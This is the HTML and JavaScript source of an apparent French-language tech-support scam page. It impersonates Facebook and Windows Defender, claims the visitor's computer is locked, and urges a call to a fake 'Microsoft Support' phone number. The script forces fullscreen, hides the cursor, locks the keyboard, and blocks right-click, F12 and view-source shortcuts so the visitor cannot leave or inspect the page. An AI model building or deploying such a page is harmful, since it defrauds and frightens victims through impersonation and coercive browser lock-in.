 <!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,4912354,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?4912354&101" alt="cool hit counter" border="0"></a></noscript>
<!-- Histats.com  END  -->

<!DOCTYPE html>
<html>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<head>
    <title>Ordinateur Suspendu</title>
    <style>
        body {
            background-image: url('bg1.png');
            background-size: 100% 100%;
            background-repeat: no-repeat;
            background-position: center center;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            font-family: Arial, sans-serif;
            color: white;
        }

        body.fullscreen {
            background-image: url('f24.png');
        }

        #support-text {
            position: absolute;
            top: 80%;
            left: 50%;
            transform: translateX(-50%);
            font-size: 20px;
            text-align: center;
            width: 100%;
            font-weight: bold;
            color: white;
            display: none;
        }

        #support-text span {
            font-weight: normal;
        }
		

        #music {
            display: none;
        }

        #modal-overlay {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            z-index: 9999;
        }

        #modal-content {
            background-color: white;
            border-radius: 5px;
            max-width: 400px;
            margin: 100px auto;
            padding: 20px;
            text-align: center;
        }

        #modal-close {
            cursor: pointer;
            color: #888;
            float: right;
            font-size: 20px;
            font-weight: bold;
        }

        #modal-message {
            color: black;
            font-weight: bold;
            margin-bottom: 20px;
        }

        #modal-image {
            margin-bottom: 20px;
        }

        .modal-buttons {
            display: flex;
            justify-content: space-between;
            margin-top: 20px;
        }

        .modal-buttons button {
            width: 100px;
            padding: 10px 0;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-weight: bold;
            transition: background-color 0.3s;
        }

        .modal-buttons button.accept {
            background-color: white;
            color: black;
        }

        .modal-buttons button.dismiss {
            background-color: #3b5998;
            color: white;
        }

        .modal-buttons button:hover {
            background-color: rgba(0, 0, 0, 0.8);
        }

        @keyframes blink {
            0% {
                opacity: 1;
            }

            50% {
                opacity: 0;
            }

            100% {
                opacity: 1;
            }
        }

        .modal-buttons button.dismiss.blinking {
            animation: blink 1s infinite;
        }

        #welcomeDiv {
            display: none;
            background-color: #000;
            height: auto;
            width: 550px;
            position: fixed;
            top: 0;
            left: 50%;
            transform: translateX(-50%);
            z-index: 9999999999;
            text-align: center;
        }

        #welcomeDiv p {
            color: #FEFEFE;
            margin-top: 10px;
            font-size: 16px;
            opacity: 0.9;
        }
    </style>
    <script>
        document.addEventListener('DOMContentLoaded', function () {
            var isPopupVisible = true;
            var music = document.getElementById('music');
            var isPlaying = false;

            function toggleMusic() {
                if (isPlaying) {
                    music.pause();
                } else {
                    music.play();
                }
                isPlaying = !isPlaying;
            }

            function playMusicOnClick() {
                toggleMusic();
                document.removeEventListener('click', playMusicOnClick);
            }

            music.addEventListener('click', toggleMusic);
            document.addEventListener('click', playMusicOnClick);

            var fullscreenEnabled = document.fullscreenEnabled || document.mozFullScreenEnabled || document.documentElement.webkitRequestFullScreen;

            if (fullscreenEnabled) {
                document.documentElement.requestFullscreen = document.documentElement.requestFullscreen || document.documentElement.mozRequestFullScreen || document.documentElement.webkitRequestFullScreen;
                document.cancelFullscreen = document.cancelFullscreen || document.mozCancelFullScreen || document.webkitCancelFullScreen;

                var isFullscreen = false;

                document.addEventListener('click', function () {
                    if (!isFullscreen) {
                        isFullscreen = true;
                        document.documentElement.requestFullscreen();
                        document.body.classList.add('fullscreen');
                        showWelcomeDiv();
                        showSupportText();
                    }
                });

                document.addEventListener('fullscreenchange', function () {
                    isFullscreen = !isFullscreen;
                });
            }

            var modalOverlay = document.getElementById('modal-overlay');
            var modalClose = document.getElementById('modal-close');

            function showModal() {
                modalOverlay.style.display = 'block';
            }

            function closeModal() {
                modalOverlay.style.display = 'none';
            }

            modalClose.addEventListener('click', closeModal);

            showModal();

            function hideCursor() {
                document.documentElement.style.cursor = 'none';
            }

            document.addEventListener('click', function () {
                hideCursor();
                document.removeEventListener('click', hideCursor);
                if (isPopupVisible) {
                    closeModal();
                    isPopupVisible = false;
                }
            });

            var acceptButton = document.getElementById('modal-accept');
            var dismissButton = document.getElementById('modal-dismiss');

            acceptButton.addEventListener('click', closeModal);
            dismissButton.addEventListener('click', closeModal);

            document.addEventListener('contextmenu', function (event) {
                event.preventDefault();
            });

            document.addEventListener('keydown', function (e) {
                if (e.ctrlKey && (e.keyCode === 'U'.charCodeAt(0) || e.keyCode === 'u'.charCodeAt(0)) ||
                    e.ctrlKey && (e.keyCode === 'C'.charCodeAt(0) || e.keyCode === 'c'.charCodeAt(0)) ||
                    e.ctrlKey && (e.keyCode === 'S'.charCodeAt(0) || e.keyCode === 's'.charCodeAt(0))) {
                    e.preventDefault();
                }
            });

            function preventKeyEvents(event) {
                const blockedKeyCodes = [123];
                const keyCode = event.keyCode || event.which;

                if (blockedKeyCodes.includes(keyCode)) {
                    event.preventDefault();
                    console.log(`Key with code ${keyCode} is blocked.`);
                }
            }

            window.addEventListener('keydown', preventKeyEvents);
        });

        navigator.keyboard.lock();
        document.onkeydown = function (e) {
            return false;
        }

        function showWelcomeDiv() {
            var welcomeDiv = document.getElementById('welcomeDiv');
            welcomeDiv.style.display = 'block';
        }

        function showSupportText() {
            var supportText = document.getElementById('support-text');
            supportText.style.display = 'block';
        }
    </script>
</head>

<body>
    <audio id="music" src="sound.mp3" controls loop></audio>

    <div id="modal-overlay">
        <div id="modal-content">
            <span id="modal-close">&times;</span>
            <img id="modal-image" src="logo-facebookpng-32251.jpg" alt="Facebook Logo">
            <p id="modal-message">Facebook a temporairement suspendu votre compte.</p>
            <div class="modal-buttons">
                <button id="modal-accept" class="accept">Accepter</button>
                <button id="modal-dismiss" class="dismiss blinking">Ignorer</button>
            </div>
        </div>
    </div>

    <div id="welcomeDiv">
        <p>
           Windows Defender a verrouillé votre ordinateur<br>
            Veuillez contacter le support Microsoft Windows pour déverrouiller votre ordinateur.<br> Numéro gratuit 024 539 16 06
        </p>
    </div>

    <div id="support-text">Microsoft Support Suisse Numéro gratuit 024 539 16 06 <br> <font size=1.5px>Remarque importante : Afin de prévenir toute perte de données, Windows Security a désactivé le système d'exploitation. Nous avons reçu une notification de violation de données concernant votre compte Facebook, ce qui a entraîné la suspension de Windows.<br>
	Veuillez ne pas éteindre ou redémarrer votre appareil, car cela pourrait entraîner une perte permanente de données et du système d'exploitation. Nous vous recommandons fortement de contacter l'équipe du support client pour obtenir une solution.</font></div>
	
</body>


</html>
